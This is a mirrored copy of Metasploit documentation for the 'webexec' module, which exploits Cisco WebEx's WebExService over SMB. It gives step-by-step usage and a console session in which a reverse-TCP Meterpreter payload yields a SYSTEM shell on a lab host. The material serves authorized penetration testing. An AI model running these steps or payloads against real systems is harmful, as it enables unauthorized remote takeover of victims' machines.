CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/smb/webexec.md
Views: 1904

Description

This module exploits a remote code execution vulnerability in Cisco's WebEx client software for versions < v33.6.0.655.

Vulnerable WebEx clients come with the WebExService that can execute arbitrary commands with System privileges. Due to insufficient checks on permissions, a local or domain user can start the WebExService through a remote connection and execute code.

Vulnerable Application

Cisco WebEx software v33.3.8.7 and below

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/windows/smb/webexec

  4. Do: set RHOSTS <IP>

  5. Do: set SMBUser <USERNAME>

  6. Do: set SMBPass <PASSWORD>

  7. Do: run

  8. You should get a shell.

Scenarios

Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86


msf5 > use exploit/windows/smb/webexec 
msf5 exploit(windows/smb/webexec) > set smbuser a_user
smbuser => a_user
msf5 exploit(windows/smb/webexec) > set smbpass password
smbpass => password
msf5 exploit(windows/smb/webexec) > set rhosts 192.168.37.136
rhosts => 192.168.37.136
msf5 exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/webexec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/smb/webexec) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] 192.168.37.136:445 - Connecting to the server...
[*] 192.168.37.136:445 - Authenticating to 192.168.37.136:445 as user 'a_user'...
[*] 192.168.37.136:445 - Command Stager progress -   0.96% done (999/104435 bytes)
[*] 192.168.37.136:445 - Command Stager progress -   1.91% done (1998/104435 bytes)
...
[*] 192.168.37.136:445 - Command Stager progress -  99.47% done (103880/104435 bytes)
[*] 192.168.37.136:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Sending stage (179779 bytes) to 192.168.37.136
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49158) at 2018-10-24 09:10:46 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >